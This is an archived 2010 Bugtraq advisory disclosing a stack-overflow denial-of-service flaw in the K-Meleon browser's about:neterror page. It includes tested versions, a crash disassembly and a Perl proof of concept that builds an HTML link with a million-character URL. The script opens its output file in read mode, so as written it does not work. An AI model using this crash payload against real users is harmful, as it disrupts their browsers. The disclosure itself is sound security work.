[<prev] [next>] [day] [month] [year] [list]
Message-ID: <AANLkTinG3wgjhyHs9y-aP3bc4iKjdGHpy24bi_3WJ_zf@mail.gmail.com>
Date: Wed, 4 Aug 2010 17:43:09 +0200
From: Lostmon lords <lostmon@...il.com>
To: bugtraq@...urityfocus.com
Subject: Fwd: {Lostmon´s Group} K-Meleon for windows about:neterror Stack Overflow DoS
############################################
K-Meleon for windows about:neterror Stack Overflow DoS
Vendor URL:http://kmeleon.sourceforge.net/
Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Vendor notified:Yes exploit available: YES
############################################
K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also
used by Firefox. K-Meleon is free, open source software released under
the GNU General Public License and is designed specifically for
Microsoft Windows (Win32) operating systems.
K-Meleon is prone vulnerable to crashing with a very long URL...
Internal web pages like about:neterror does not limit the amount of
chars that a user put in 'c' 'd' params and them if we compose a
malformed url the browser can be chash easy.This issue is exploitable
via web links like <a href="very long url">click here</a> or via
window.location.replace('very long url') or similar vectors.
#################
Versions Tested
#################
I have tested this issue in win xp sp3 and a windows 7 fully pached.
Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)
windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)
############
References
############
Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:
########################
ASM code stack overflow
########################
ScreenShot => http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s1600/k-meleon.png
CPU Disasm
Address Hex dump Command
0043CB3F CC INT3
0043CB40 /$ 3D 00100000 CMP EAX,1000
0043CB45 |. 73 0E JNB SHORT 0043CB55
0043CB47 |. F7D8 NEG EAX
0043CB49 |. 03C4 ADD EAX,ESP
0043CB4B |. 83C0 04 ADD EAX,4
0043CB4E |. 8500 TEST DWORD PTR DS:[EAX],EAX
0043CB50 |. 94 XCHG EAX,ESP
0043CB51 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
0043CB53 |. 50 PUSH EAX
0043CB54 |. C3 RETN
0043CB55 |> 51 PUSH ECX
0043CB56 |. 8D4C24 08 LEA ECX,[ARG.1]
0043CB5A |> 81E9 00100000 /SUB ECX,1000
0043CB60 |. 2D 00100000 |SUB EAX,1000
0043CB65 |. 8501 |TEST DWORD PTR DS:[ECX],EAX <== Stack overflow
0043CB67 |. 3D 00100000 |CMP EAX,1000
0043CB6C |.^ 73 EC \JNB SHORT 0043CB5A
0043CB6E |. 2BC8 SUB ECX,EAX
0043CB70 |. 8BC4 MOV EAX,ESP
0043CB72 |. 8501 TEST DWORD PTR DS:[ECX],EAX
0043CB74 |. 8BE1 MOV ESP,ECX
0043CB76 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]
0043CB78 |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]
0043CB7B |. 50 PUSH EAX
0043CB7C \. C3 RETN
0043CB7D CC INT3
0043CB7E CC INT3
################
#Proof Of Concept
################
#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@...il.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Usage: $0 <archivo.html>\n";
}
$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x
1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";
$datos = $cabecera . $payload . $fin;
open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);
exit;
################## EOF ######################
##############
Related Links
##############
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776
###################### €nd #############################
Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.
atentamente:
Lostmon (lostmon@...il.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente...
Powered by blists - more mailing lists